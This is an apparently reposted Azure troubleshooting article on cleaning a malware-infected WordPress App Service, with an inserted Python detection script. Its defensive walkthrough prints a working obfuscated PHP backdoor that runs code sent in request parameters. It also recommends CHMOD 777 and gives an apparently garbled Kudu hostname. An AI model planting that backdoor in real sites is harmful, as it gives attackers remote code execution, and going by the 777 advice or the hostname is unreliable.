

Azure Troubleshooting: Fix WordPress App Service infected with malware code injection

Introduction

In this article we review how to restore a WordPress web application running on Azure (PaaS) after a possible code injection.

Problem

We have an interruption in the service of our web application (PaaS) due to malware, cross-site scripting or code injection.

Solution

Ideally, the most feasible and advisable setup is to have a WAF / Application Gateway in front of the WebApp and the WebApp inside a Virtual Network. That said, the steps below are one of many ways to recover a web application affected by this kind of incident.

To resolve the service interruption in this specific case, we first go to the Kudu console of the application, which you can access at:

"Your-website-name.scm.wikiazurewebsites.net"

We will access a screen like the one shown below:

Once we access it we will go to Debug Console -> CMD:

Now that we are in the console, we are going to look for an index file and browse the directories of our application:

Although the WordPress web app directories are within WWWRoot, the XSS vulnerability affects all Azure web application directories, including "SiteExtensions", so it is highly recommended that you review all directories in detail.

Recommendation: Check the directories first:

  • /wwwroot/site/
  • /wp-content/
  • /wp-content/plugins/
  • /wp-includes/

The malicious code is usually found right away in the application's index.php files or in files with the .suspected extension. You might also see new folders that were created with random names. For example, the folder pridmag wasn't part of the application:

Once we go to analyze the file, we will see this malicious code:

Example of malicious code: 

$qPdntpyq4160 = "o9)d.tfj03/1vgzmubk2er(5x7w_84a*np;yl6schiq";
  
  
$lsfpcQSs2632 = "";
  
foreach([38,0,21,5] as  $j){
       $lsfpcQSs2632 .= $qPdntpyq4160[$j];
    }
  
  
if(isset($REQUEST /*pDsiayAqJlLkUzqpLBhEOdDBhpwfwWcNLloyGTzLkezyeFGjrGNRDUmTSFTqQzcDBNEHFgRafRGGIEqWrFNXMEofXOLuEVwoLinKXoCjuxhHFxuDKwfWoiJkvSVsLkjR*/["$lsfpcQSs2632"])){
    $owqHJoHl5389 = $_REQUEST /*pDsiayAqJlLkUzqpLBhEOdDBhpwfwWcNLloyGTzLkezyeFGjrGNRDUmTSFTqQzcDBNEHFgRafRGGIEqWrFNXMEofXOLuEVwoLinKXoCjuxhHFxuDKwfWoiJkvSVsLkjR*/["$lsfpcQSs2632"];
    $JYzXAdsa7417 = "";
    $kLAwcVVk3573 = "";
  
    /*SPkGyjnOAjltqokEMwPjggdrqqGOHxDNYCzXGbyFxUgvQFAGBgoWYVyEXXKnRLdlxihhiNdoPztrKPkBKIgEjDmKYyhGuSWDqHkldsbRzXagXTnqnfseOfuKsTYSrSjO*/
  
    foreach([17,30,38,20,37,29,27,3,20,39,0,3,20] as  $j){
       $JYzXAdsa7417 .= $qPdntpyq4160[$j];
    }
  
    /*CaFjsRsoDobPDQJYjvXzNBVEghiYHMPTinuaajdEbzvsDGzzzEWMfQQropMXrzPRhtDKcviOSDiOXqJUiHpUQYfXPqJQvgiJAtfoxAGRdBpdKUmjkDbUVaMxJlaCSGVu*/
  
  
    foreach([38,5,21,21,20,12] as  $j){
       $kLAwcVVk3573 .= $qPdntpyq4160[$j];
    }
  
    /*nmbMmzyOHtQmRrirHtgPuWOQXZLhIabZsYqdurJEFeKorIytwcFCmLjdFHOHSoBxSEZnWdnoWIYklSioFFxkytXkGimZvuuPLebrRImRHgFayVlcibJKdVfkaCclsvHb*/
  
    $j = $kLAwcVVk3573('n'.'o'.''.''.''.''.'i'.'t'.'c'.'n'.''.''.''.''.'u'.''.''.''.''.'f'.''.''.''.''.'_'.'e'.''.''.''.'t'.''.''.'a'.''.''.'e'.''.''.'r'.''.'c');
    $c = $j("", $JYzXAdsa7417($owqHJoHl5389));
    $c();
    exit();
  
}
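The sample above builds its function names from a lookup string and index arrays, and hides another as a reversed chain of quoted fragments. As an added example (not part of the original article), the Python below decodes both patterns statically and flags files that contain them; it assumes you scan a downloaded copy of the site, and the names `scan_text`, `scan_tree` and the `RISKY` list are illustrative choices made here.

```python
import re
from pathlib import Path

RISKY = {"create_function", "base64_decode", "strrev", "eval", "assert"}
LOOKUP = re.compile(r'\$\w+\s*=\s*"([^"\n]{20,})"\s*;')       # long lookup string
INDEXES = re.compile(r"foreach\s*\(\s*\[([\d,\s]+)\]\s*as")   # literal index array
CHAIN = re.compile(r"(?:'[^'\n]*'\s*\.\s*){3,}'[^'\n]*'")     # 'a'.'b'.''.'c'
# Inert, reduced excerpt of the sample above, used as constructed test input.
SAMPLE = """$t = "o9)d.tfj03/1vgzmubk2er(5x7w_84a*np;yl6schiq";
foreach([38,5,21,21,20,12] as $j){ $f .= $t[$j]; }
$g = $f('n'.'o'.''.'i'.'t'.'c'.'n'.'u'.'f'.'_'.'e'.'t'.'a'.'e'.'r'.'c');
if(isset($_REQUEST["x"])){ }"""

def decode_index_strings(php):
    """Rebuild strings assembled as $lookup[$j] over a literal index array."""
    decoded = []
    for table in LOOKUP.findall(php):
        for arr in INDEXES.findall(php):
            idx = [int(n) for n in arr.split(",") if n.strip()]
            if idx and max(idx) < len(table):
                decoded.append("".join(table[i] for i in idx))
    return decoded

def joined_literals(php):
    """Collapse quoted-fragment chains into one string and its reverse."""
    out = []
    for m in CHAIN.finditer(php):
        s = "".join(re.findall(r"'([^'\n]*)'", m.group(0)))
        out += [s, s[::-1]]
    return out

def scan_text(name, php):
    """Return sorted findings for one file name and its contents."""
    found = {"hidden-call:" + s
             for s in decode_index_strings(php) + joined_literals(php) if s in RISKY}
    if found and re.search(r"\$_?REQUEST\b", php):
        found.add("request-driven-execution")
    if ".suspected" in name:
        found.add("suspicious-extension")
    return sorted(found)

def scan_tree(root):
    """Scan a downloaded copy of the site; map file path -> findings."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and (".php" in p.name or ".suspected" in p.name):
            if hits := scan_text(p.name, p.read_text(errors="replace")):
                report[str(p)] = hits
    return report
```

Run `scan_tree` against the local copy and review every reported path by hand before deleting or restoring anything; a clean result only means these two obfuscation patterns were not found.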

In most cases these types of files are not editable.

If you try to delete or modify the file, you get the error below:

** Note: we added a ".p" at the end of the malicious file name; the original malicious file name was db.php.suspected.

We will perform the following steps to be able to delete the file or restore the original:

Option 1. Delete files

In the Kudu console, we will go to the directory where the file is located.

We will verify the read / write attributes of the file with the command below:

"attrib db.php.suspected.p"

** Note: the list below describes the attribute parameters for files.

Parameters

  • +r: Sets the read-only file attribute.
  • -r: Clears the read-only file attribute.
  • +a: Sets the archive file attribute.
  • -a: Clears the archive file attribute.
  • +s: Sets the system file attribute.
  • -s: Clears the system file attribute.
  • +h: Sets the hidden file attribute.
  • -h: Clears the hidden file attribute.

In this case we will use attrib -r db.php.suspected.p

Once we have done this step we can delete the malicious file. We are going to click back on the browser and click on the icon as shown below:

Option 2. Modify files

If Option 1 above does not work, we will execute the CHMOD command to change the write permissions of this specific file:

CHMOD 777 db.php.suspected.p

** Note: this could be CHMOD 644, depending on the appropriate level of permissions:

Files / Folders Permissions

  • wp-content (755)
  • wp-includes (644)
  • All .php files (644)
  • All folders (755)
  • wp-config.php (public_html folder) (444)
  • index.php (public_html folder) (444)

After that we will be able to delete the file.

** Note: if it is still not possible to delete the file:

  • Stop the application
  • Change the read / write permissions by executing CHMOD 777 file.php
  • Delete or modify the file.

Option 3. Restore Files

Connect to the application via SFTP and replace the file. You must first change the file's write permissions.

Usually the malware starts in an index.php and spreads to other directories, so you have to inspect all the directories and delete the malicious files or restore them.

Alternative suggestions

  • Use security plugins such as Sucuri Security or All In One WP Security & Firewall, which secure, harden and regularly scan your website.
  • Deploy your webapp within a VNet
  • Enable WAF and try to automate rule updates whenever possible
  • Best Practices For WordPress Security On Azure

Other Languages

es-MX: Azure: Cómo restaurar un AppService wordpress con malware(es-MX)

Glossary

  • XSS: Cross-site scripting
  • CHMOD: Change mode
  • SFTP: SSH File Transfer Protocol